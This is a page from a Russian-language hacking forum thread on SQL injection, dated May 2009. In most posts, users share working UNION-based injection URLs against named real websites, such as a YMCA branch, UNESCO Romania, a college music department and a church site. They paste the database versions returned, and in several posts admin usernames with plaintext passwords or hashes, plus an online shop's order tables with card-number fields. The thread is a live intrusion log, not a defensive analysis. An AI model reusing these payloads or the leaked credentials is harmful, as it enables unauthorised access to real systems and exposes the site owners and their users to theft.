FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 934 из 1602

934

Опции темы

Поиск в этой теме

Опции просмотра

23.05.2009, 17:27

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness

Unesco Romania

23.05.2009, 17:39

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Unesco Romania

http://www.cnr-unesco.ro/ro/stire.php?id=-121+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11/*

Database Version: 4.1.22
Database name: tibiq_unesco
User name: tibiq_unesco@localhost
Os: redhat-linux-gnu

23.05.2009, 18:23

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

[PR 3]

Код:

http://www.timeshare-obmen.ru/bonus.php?id=-3448449+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13--

5.0.26-log:timeshareb:timeshareb@localhost

[PR 3]

Код:

http://www.piyanas.com/bonus.php?id=-1361+union+select+1,2,concat_ws(0x3a,version(),database(),user())--&lang=en

5.0.51a-community:piyanas_db:piyanas_piyanas@localhost

Код:

http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(table_name),3+from+information_schema.tables--&lang=en

Цитата:

ilo_administrator_user

Код:

http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x696c6f5f61646d696e6973747261746f725f75736572--&lang=en

columns from table ilo_administrator_user

Цитата:

administrator_id,username,password,menu1,menu2,men u3,menu4,menu5,menu6,menu9,description

Код:

http://www.piyanas.com/bonus.php?id=-1361+union+select+1,concat_ws(0x3a,administrator_id,username,password),3+from+ilo_administrator_user--&lang=en

administrator_id,username,password

Цитата:

1:admin:py9999
2:sale:1234
3:manager:1234

23.05.2009, 19:01

_Quest_

Новичок

Регистрация: 21.05.2009

Сообщений: 11

Провел на форуме:
59923

Репутация: 65

ШОП http://store.yeproc.com

_http://www.yeproc.com/upload/media/view_media.php?id=-459+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15,16,17--

Код:

189 :In database redeyedb found table store_fixes_recreate_orders
  0 :   username
  1 :   full_name
  2 :   email
  3 :   order_number
  4 :   order_date
  5 :   order_date_time
  6 :   order_shipping
  7 :   order_tax
  8 :   order_total
  9 :   card_number
  10 :   product_id
  11 :   item_number
  12 :   product_type
  13 :   description
  14 :   artist_name
  15 :   value_add_flag
  16 :   quantity
  17 :   unit_price
  18 :   line_total
  19 :   bill_name_first
  20 :   bill_name_last
  21 :   bill_address1
  22 :   bill_address2
  23 :   bill_address3
  24 :   bill_city
  25 :   bill_state
  26 :   bill_postal_code
  27 :   bill_country
  28 :   bill_phone
  29 :   ship_name_first
  30 :   ship_name_last
  31 :   ship_address1
  32 :   ship_address2
  33 :   ship_address3
  34 :   ship_city
  35 :   ship_state
  36 :   ship_postal_code
  37 :   ship_country
  38 :   ship_phone

и вторая бд.

Код:

214 :In database redeyedb found table store_order
  0 :   id
  1 :   id_store
  2 :   id_store_user
  3 :   session_id
  4 :   order_number
  5 :   order_date
  6 :   subtotal
  7 :   tax
  8 :   shipping
  9 :   total
  10 :   card_type
  11 :   card_number
  12 :   card_expiration
  13 :   card_name
  14 :   bill_name_first
  15 :   bill_name_last
  16 :   bill_address1
  17 :   bill_address2
  18 :   bill_address3
  19 :   bill_city
  20 :   bill_state
  21 :   bill_postal_code
  22 :   bill_country
  23 :   bill_phone
  24 :   ship_name_first
  25 :   ship_name_last
  26 :   ship_address1
  27 :   ship_address2
  28 :   ship_address3
  29 :   ship_city
  30 :   ship_state
  31 :   ship_postal_code
  32 :   ship_country
  33 :   ship_phone
  34 :   facts_export_id
  35 :   digital_export_id

Последний раз редактировалось jokester; 23.05.2009 в 19:55.. Причина: 2008.rif.ru БОЯН

23.05.2009, 19:10

udman

Постоянный

Регистрация: 21.04.2009

Сообщений: 321

Провел на форуме:
785842

Репутация: 239

Цитата:

http://zona.zp.ua/boardname.php?c=-85+UNI ON+SELECT+0,concat_ws(0x0 b,user(),version(),database())

ivan_zona@localhost
5.0.77-community
ivan_zona

Логины пассы юзерей

Цитата:

http://zona.zp.ua/boardname.php?c=-85+UNION+SELECT+0,c oncat_ws(0x0b,password,u_email)+FROM+ivan_zona.use r s+--+

Цитата:

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UNION+SELECT+1,CONCAT(user() ,0x0b,database(), 0x0b,ve rsion()),3,4+FROM+users+LIMIT+1,10--

u_client_salgir@localhost
salgir
4.1.22-log

Юзеры

Цитата:

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UN ION+SELECT+1,CONCAT(user(),0x0b,database(),0x0b,ve rsion()),3,4+FROM+u sers+LIMIT+1,10--

Цитата:

http://alchevsk-city.com/board.php?board=8'+UNION+SELECT+0,1,2,concat_ws(0x 0b,version(),datab ase(),us er()),4+--+

4.1.22-standard
total_city
total_city@localhost

Цитата:

http://crimea.swingua.net/index.php?find_age=-2+UNION+SELECT+0,2,3,4,5,6,7,CONCAT_WS(0x0b,Ve rsion(),Database(),U ser()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25+--+&find_month=300&find_status=6&find_who=100&mod=se arch&sortby=D

4.1.22-standard
handy_crimea
handy_crimea@localhost

Последний раз редактировалось udman; 23.05.2009 в 21:48..

23.05.2009, 20:56

beerhack

Участник форума

Регистрация: 01.03.2008

Сообщений: 149

Провел на форуме:
3395070

Репутация: 173

PR6

Код:

http://www.augustana.edu/academics/music/department/facultyBio.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/*

Database Version: 4.1.22-log
Database name: music
User name: music@freya.augustana.edu

music:244ed17b5aa3b964

23.05.2009, 21:26

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

http://www.reformjudaismboston.org/content.php?id=-108'+union+select+1,database(),3,4,5,6,7,8,9,10,11 ,12+--+
reformjudaismboston_org_-_invision2

23.05.2009, 21:29

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4--

Database Version: 5.0.54-log
Database name: netmedica
User name: netmedicasql@localhost
Os: pc-linux-gnu

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_Ws(0x3a,user_name,user_pa sswd),3,4+FROM+netmedica.users+LIMIT+x,1--

0]:testuser:a/Uw5jGt4sWxY
[1]:testadmin:e2d1903c479e40495a09ee7e40e42de8
[2]:admin:gzAV0iFKm9PbU
[3]:gabi:3Kbi7htfFdTew
[4]:dafi:.S9LiwYFcjV2c
[5]:adm:e2d1903c479e40495a09ee7e40e42de8
[6]:aqsw12:e2d1903c479e40495a09ee7e40e42de8

23.05.2009, 21:51

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

pr6
http://www.semops.com/content.php?id=-296+union+select+1,2,3,4,5,6,7,database(),9,10+fro m+users+/*+
semops
Колонки не смог подобрать((

http://www.jimmcleantexas.com/content.php?id=-33+union+select+1,2,username,password,5,6,7,8,9+fr om+admin+/*+
admin::21232f297a57a5a743894a0e4a801fc3 - admin

Последний раз редактировалось DezMond™; 23.05.2009 в 22:01..

#10

24.05.2009, 00:04

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

-------------------------------------------------

http://www.clubservices.com.mx/prov.php?id=116+union+select+1,2,3,4,5,6,7

5.0.45:sci@localhost:SCI

таблицы: http://www.clubservices.com.mx/prov.php?id=-116+union+select+table_name,2,3,4,5,6,7+from+infor mation_schema.tables

--------------------------------------------------------
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database())

5.0.32-Debian_7etch10-log:hnk@localhost:hnk

нас интересует:
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,table_name +from+information_schema.tables+limit+34,1/*

поля:
user_id
type
first_name
last_name
email
login
password

Число записей: http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,count(*)+f rom+users/*
одна запись

http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,login,password)+from+users/*
zlatko:monografija

-------------------------------------

да простит меня Бог. следующий сайт
http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,3,4,5,6,7,8

http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,concat_ws(0x3a, version(),user(),database()),4,5,6,7,8
4.1.20